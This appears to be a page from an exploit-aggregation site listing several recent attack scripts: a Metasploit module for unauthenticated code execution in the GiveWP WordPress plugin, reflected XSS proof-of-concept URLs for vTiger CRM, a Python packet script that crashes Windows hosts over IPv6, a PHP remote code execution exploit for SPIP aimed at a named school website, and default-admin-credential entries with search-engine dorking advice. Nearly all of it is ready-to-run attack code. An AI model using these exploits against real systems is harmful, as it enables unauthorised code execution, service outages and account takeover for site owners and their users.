Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HTTP::Wordpress prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'GiveWP Unauthenticated Donation Process Exploit', 'Description' => %q{ The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress in all versions up to and including 3.14.1 is vulnerable to a PHP Object Injection (POI) attack granting an unauthenticated arbitrary code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'Villu Orav', # Initial Discovery 'EQSTSeminar', # Proof of Concept 'Julien Ahrens', # Vulnerability Analysis 'Valentin Lobstein' # Metasploit Module ], 'References' => [ ['CVE', '2024-5932'], ['URL', 'https://github.com/EQSTSeminar/CVE-2024-5932'], ['URL', 'https://www.rcesecurity.com/2024/08/wordpress-givewp-pop-to-rce-cve-2024-5932'], ['URL', 'https://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin'] ], 'DisclosureDate' => '2024-08-25', 'Platform' => %w[unix linux win], 'Arch' => [ARCH_CMD], 'Privileged' => false, 'Targets' => [ [ 'Unix/Linux Command Shell', { 'Platform' => %w[unix linux], 'Arch' => ARCH_CMD # tested with cmd/linux/http/x64/meterpreter/reverse_tcp } ], [ 'Windows Command Shell', { 'Platform' => 'win', 'Arch' => ARCH_CMD # tested with cmd/windows/http/x64/meterpreter/reverse_tcp } ] ], 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) end def check return CheckCode::Unknown unless wordpress_and_online? print_status("WordPress Version: #{wordpress_version}") if wordpress_version check_code = check_plugin_version_from_readme('give', '3.14.2') return CheckCode::Safe unless check_code.code == 'appears' print_good("Detected GiveWP Plugin version: #{check_code.details[:version]}") CheckCode::Appears end def exploit forms = fetch_form_list fail_with(Failure::UnexpectedReply, 'No forms found.') if forms.empty? selected_form = forms.sample valid_form = retrieve_and_analyze_form(selected_form['id']) return print_error('Failed to retrieve a valid form for exploitation.') unless valid_form print_status("Using Form ID: #{valid_form['give_form_id']} for exploitation.") send_exploit_request( valid_form['give_form_id'], valid_form['give_form_hash'], valid_form['give_price_id'], valid_form['give_amount'] ) end def fetch_form_list res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'data' => 'action=give_form_search' ) return print_error('Failed to retrieve form list.') unless res&.code == 200 forms = JSON.parse(res.body) form_ids = forms.map { |form| form['id'] }.sort print_good("Successfully retrieved form list. Available Form IDs: #{form_ids.join(', ')}") forms end def retrieve_and_analyze_form(form_id) form_res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'vars_post' => { 'action' => 'give_donation_form_nonce', 'give_form_id' => form_id } ) return unless form_res&.code == 200 form_data = JSON.parse(form_res.body) give_form_id = form_id give_form_hash = form_data['data'] give_price_id = '0' give_amount = '$10.00' # Somehow, can't randomize give_price_id and give_amount otherwise the exploit won't work. return unless give_form_hash { 'give_form_id' => give_form_id, 'give_form_hash' => give_form_hash, 'give_price_id' => give_price_id, 'give_amount' => give_amount } end def send_exploit_request(give_form_id, give_form_hash, give_price_id, give_amount) final_payload = format( 'O:19:"Stripe\\\\\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";' \ 'O:62:"Give\\\\\\\\PaymentGateways\\\\\\\\DataTransferObjects\\\\\\\\GiveInsertPaymentData":1:{' \ 's:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";' \ 'O:33:"Give\\\\\\\\Vendors\\\\\\\\Faker\\\\\\\\ValidGenerator":3:{s:12:"\\0*\\0validator";' \ 's:10:"shell_exec";s:12:"\\0*\\0generator";' \ 'O:34:"Give\\\\\\\\Onboarding\\\\\\\\SettingsRepository":1:{' \ 's:11:"\\0*\\0settings";a:1:{s:8:"address1";s:%<length>d:"%<encoded>s";}}' \ 's:13:"\\0*\\0maxRetries";i:10;}}}}}}', length: payload.encoded.length, encoded: payload.encoded ) data = { 'give-form-id' => give_form_id, 'give-form-hash' => give_form_hash, 'give-price-id' => give_price_id, 'give-amount' => give_amount, 'give_first' => Faker::Name.first_name, 'give_last' => Faker::Name.last_name, 'give_email' => Faker::Internet.email, 'give_title' => final_payload, 'give-gateway' => 'offline', 'action' => 'give_process_donation' } send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'data' => URI.encode_www_form(data) }, 0) end end </code></pre>

<pre><code>[CVE-ID]:CVE-2024-44778 ------------------------------------------ [Suggested description]:A reflected cross-site scripting (XSS) vulnerability in the parent parameter in the index page of vTiger CRM 7.4.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload. ------------------------------------------ [Additional Information] PoC: https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Invoice&view=List&app=INVENTORY&parent=%22-alert()-%22 ------------------------------------------ [Vulnerability Type]:Cross Site Scripting (XSS) ------------------------------------------ [Vendor of Product]:vTiger ------------------------------------------ [Affected Product Code Base]:vTiger CRM - 7.4.0. ------------------------------------------ [Affected Component]:The parent parameter of vTiger CRM 7.4.0 Index page ------------------------------------------ [Attack Type]:Remote ------------------------------------------ [CVE Impact Other]:Run Arbitrary Javascript code ------------------------------------------ [Attack Vectors]:Crafted URL ------------------------------------------ [Has vendor confirmed or acknowledged the vulnerability?]:true ------------------------------------------ [Discoverer]:Marco Nappi ------------------------------------------ [Reference] http://vtiger.com https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Invoice&view=List&app=INVENTORY&parent=%22-alert()-%22 [CVE-ID]:CVE-2024-44779 ------------------------------------------ [Suggested description] A reflected cross-site scripting (XSS) vulnerability in the viewname parameter in the index page of vTiger CRM 7.4.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload. ------------------------------------------ [Additional Information]: PoC: https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Accounts&view=List&viewname=95ddd'+onpointerdown=alert()+alt= ------------------------------------------ [Vulnerability Type] Cross Site Scripting (XSS) ------------------------------------------ [Vendor of Product]:vTiger ------------------------------------------ [Affected Product Code Base]:vTiger CRM - 7.4.0. ------------------------------------------ [Affected Component]:The "viewname" parameter of vTiger CRM 7.4.0 Index page . ------------------------------------------ [Attack Type]:Remote ------------------------------------------ [CVE Impact Other]: Run Arbitrary JS code ------------------------------------------ [Attack Vectors] Crafted URL ------------------------------------------ [Has vendor confirmed or acknowledged the vulnerability?]:true ------------------------------------------ [Discoverer]:Marco Nappi ------------------------------------------ [Reference] http://vtiger.com https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Accounts&view=List&viewname=95ddd [CVE-ID]:CVE-2024-44777 ------------------------------------------ [Suggested description] A reflected cross-site scripting (XSS) vulnerability in the tag parameter in the index page of vTiger CRM 7.4.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload. ------------------------------------------ [Additional Information] PoC: https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Invoice&view=List&app=INVENTORY&tag=);alert();%22+alt=%22 ------------------------------------------ [Vulnerability Type]:Cross Site Scripting (XSS) ------------------------------------------ [Vendor of Product]:vTiger ------------------------------------------ [Affected Product Code Base]:vTiger CRM - 7.4.0. ------------------------------------------ [Affected Component] The "tag" parameter of vTiger CRM 7.4.0 Index page ------------------------------------------ [Attack Type]:Remote ------------------------------------------ [CVE Impact Other] Run Arbitrary Javascript code ------------------------------------------ [Attack Vectors]:Crafted URL ------------------------------------------ [Has vendor confirmed or acknowledged the vulnerability?]:true ------------------------------------------ [Discoverer]:Marco Nappi ------------------------------------------ [Reference] http://vtiger.com https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Invoice&view=List&app=INVENTORY&tag=);alert();%22+alt=%22 </code></pre>

<pre><code>#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Exploit Title: Windows IPv6 CVE-2024-38063 Checker and Denial-Of-Service # Date: 2024-08-07 # Exploit Author: Photubias # Vendor Homepage: https://microsoft.com # Vendor Advisory: [1] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063 # Version: Windows 10, 11 <10.0.26100.1457 and Server 2016-2019-2022 <10.0.17763.6189 # Tested on: Windows 11 23H2 and Windows Server 2022 # CVE: CVE-2024-38063 import os, subprocess, re, time, sys ## Variables sDstIP = 'fe80::78b7:6283:49ad:c565' ## Placeholder if len(sys.argv) > 1: sDstIP = sys.argv[1] ## Please provide an argument sDstMAC = '00:0C:29:55:E1:C8' ## Not required, will try to get the MAC via Neighbor Discovery iBatches = 20 iCorruptions = 20 ## How many times do we want to corrupt the tcpip.sys memory per batch try: print('--- Loading Scapy, might take some time ...') from scapy.config import conf conf.ipv6_enabled = False import scapy.all as scapy scapy.conf.verb = 0 except: print('Error while loading scapy, please run "pip install scapy"') exit(1) import logging logging.getLogger('scapy.runtime').setLevel(logging.ERROR) def selectInterface(): #adapter[] = npfdevice, ip, mac def getAllInterfaces(): lstInterfaces=[] if os.name == 'nt': proc = subprocess.Popen('getmac /NH /V /FO csv | FINDSTR /V /I disconnected', shell=True, stdout=subprocess.PIPE) for bInterface in proc.stdout.readlines(): lstInt = bInterface.split(b',') sAdapter = lstInt[0].strip(b'"').decode() sDevicename = lstInt[1].strip(b'"').decode() sMAC = lstInt[2].strip(b'"').decode().lower().replace('-', ':') sWinguID = lstInt[3].strip().strip(b'"').decode()[-38:] proc = subprocess.Popen('netsh int ipv6 show addr "{}" | FINDSTR /I Address'.format(sAdapter), shell=True, stdout=subprocess.PIPE) try: sIP = re.findall(r'[\w:]+:+[\w:]+', proc.stdout.readlines()[0].strip().decode())[0] except: sIP = '' if len(sMAC) == 17: lstInterfaces.append([sAdapter, sIP, sMAC, sDevicename, sWinguID]) # When no or bad MAC address (e.g. PPP adapter), do not add else: proc = subprocess.Popen('for i in $(ip address | grep -v "lo" | grep "default" | cut -d":" -f2 | cut -d" " -f2);do echo $i $(ip address show dev $i | grep "inet6 " | cut -d" " -f6 | cut -d"/" -f1) $(ip address show dev $i | grep "ether" | cut -d" " -f6);done', shell=True, stdout=subprocess.PIPE) for bInterface in proc.stdout.readlines(): lstInt = bInterface.strip().split(b' ') try: if len(lstInt[2]) == 17: lstInterfaces.append([lstInt[0].decode(), lstInt[1].decode(), lstInt[2].decode(), '', '']) except: pass return lstInterfaces lstInterfaces = getAllInterfaces() if len(lstInterfaces) > 1: i = 1 for lstInt in lstInterfaces: #array of arrays: adapter, ip, mac, windows devicename, windows guID print('[{}] {} has {} ({})'.format(i, lstInt[2], lstInt[1], lstInt[0])) i += 1 #sAnswer = input('[?] Please select the adapter [1]: ') sAnswer='3' else: sAnswer = None if not sAnswer or sAnswer == '' or not sAnswer.isdigit() or int(sAnswer) >= i: sAnswer = 1 iAnswer = int(sAnswer) - 1 sNPF = lstInterfaces[iAnswer][0] sIP = lstInterfaces[iAnswer][1] sMAC = lstInterfaces[iAnswer][2] if os.name == 'nt': sNPF = r'\Device\NPF_' + lstInterfaces[iAnswer][4] return (sNPF, sIP, sMAC, lstInterfaces[iAnswer][3]) def get_packets(iID, sDstIPv6, sDstMac=None): iFragID = 0xbedead00 + iID oPacket1 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrDestOpt(options=[scapy.PadN(otype=0x81, optdata='bad')]) oPacket2 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 1, offset = 0) / 'notalive' oPacket3 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 0, offset = 1) if sDstMac: ## Should always be this, it seems sending to 'ff:ff:ff:ff:ff:ff' does not work oPacket1 = scapy.Ether(dst=sDstMac) / oPacket1 oPacket2 = scapy.Ether(dst=sDstMac) / oPacket2 oPacket3 = scapy.Ether(dst=sDstMac) / oPacket3 return [oPacket1, oPacket2, oPacket3] def doIPv6ND(sDstIP, sInt): ## Try to get a MAC address via IPv6 Neighbour Sollicitation sMACResp = None oNeighborSollicitation = scapy.IPv6(dst=sDstIP) / scapy.ICMPv6ND_NS(tgt=sDstIP) / scapy.ICMPv6NDOptSrcLLAddr(lladdr='ff:ff:ff:ff:ff:ff') oResponse = scapy.sr1(oNeighborSollicitation, timeout=5, iface=sInt) if oResponse and scapy.ICMPv6NDOptDstLLAddr in oResponse: sMACResp = oResponse[scapy.ICMPv6NDOptDstLLAddr].lladdr return sMACResp lstInt = selectInterface() ## NPF, IPv6, MAC, Name sMAC = doIPv6ND(sDstIP, lstInt[0]) if sMAC: print(f'[+] Target {sDstIP} is reachable, got MAC Address {sMAC}') sDstMAC = sMAC elif sDstMAC != '': print('[-] Target not responding to Neighbor Sollicitation Packets, using the provided MAC {}'.format(sDstMAC)) else: print('[-] Without a MAC address, this exploit will probably not work') lstPacketsToSend = [] for i in range(iBatches): for j in range(iCorruptions): lstPacketsToSend += get_packets(j, sDstIP, sDstMAC) + get_packets(j, sDstIP, sDstMAC) ## 'send' is Layer3 (let scapy figure out the MAC address), 'sendp' is L2 (MAC address is filled in, much better) print('[i] Verifying vulnerability against IPv6 address {}'.format(sDstIP)) ## Verification first: "ICMPv6ParamProblem" lstResp = scapy.srp1(lstPacketsToSend[0], iface=lstInt[0], timeout=5) if lstResp and scapy.IPv6 in lstResp[0] and scapy.ICMPv6ParamProblem in lstResp[0]: print('[+] Yes, {} is vulnerable and exploitable for CVE-2024-38063'.format(sDstIP)) else: input('[-] Not vulnerable or firewall is enabled. Please verify and rerun or press enter to continue') print('[i] Waiting 10 seconds to let the target cool down (more is better)') time.sleep(10) input('[?] OK, continue to execute the Denial Of Service (BSOD)? Press Ctrl+C to cancel now') ########## Exploit print('[+] Sending {} packets now via interface {} {}'.format(len(lstPacketsToSend), lstInt[0], lstInt[3])) scapy.conf.verb = 1 scapy.sendp(lstPacketsToSend, iface=lstInt[0]) print('[+] All packets are sent, now it takes *exactly* 60 seconds for the target to crash') </code></pre>

<pre><code>============================================================================================================================================= | # Title : SPIP 4.2.5 PHP Code execution Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) | | # Vendor : https://www.spip.net/ | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] Line 49 : Set your target. [+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php [+] Payload : <?php class IndoushkaExploit { private $targetUrl; private $payload; public function __construct($targetUrl, $payload) { $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php'; $this->payload = $this->generatePayload($payload); } private function generatePayload($payload) { // توليد الحمولة مع تضمين الأمر المراد تنفيذه return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]"; } public function exploit() { // إعداد بيانات POST التي سيتم إرسالها إلى الهدف $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]); // تهيئة طلب HTTP باستخدام دالة cURL $ch = curl_init($this->targetUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); // إضافة رؤوس مخصصة لتجاوز المنع curl_setopt($ch, CURLOPT_HTTPHEADER, [ 'Content-Type: application/x-www-form-urlencoded', 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3' ]); // تنفيذ الطلب $response = curl_exec($ch); // تحقق من وجود أخطاء في cURL if (curl_errno($ch)) { echo "cURL Error: " . curl_error($ch) . "\n"; } else { echo "Exploit Sent! Response:\n"; echo $response; } curl_close($ch); } } // مثال على الاستخدام $targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي $payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها $exploit = new IndoushkaExploit($targetUrl, $payload); $exploit->exploit(); Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : Online Appointment System v1.0 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://www.sourcecodester.com/php/14502/online-appointment-system-php-full-source-code-2020.html | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user = admin & pass = admin123 [+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/ Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>============================================================================================================================================= | # Title : Multi-Vendor Online Groceries Management System v1.0 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user = admin & pass = admin123 [+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/ Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>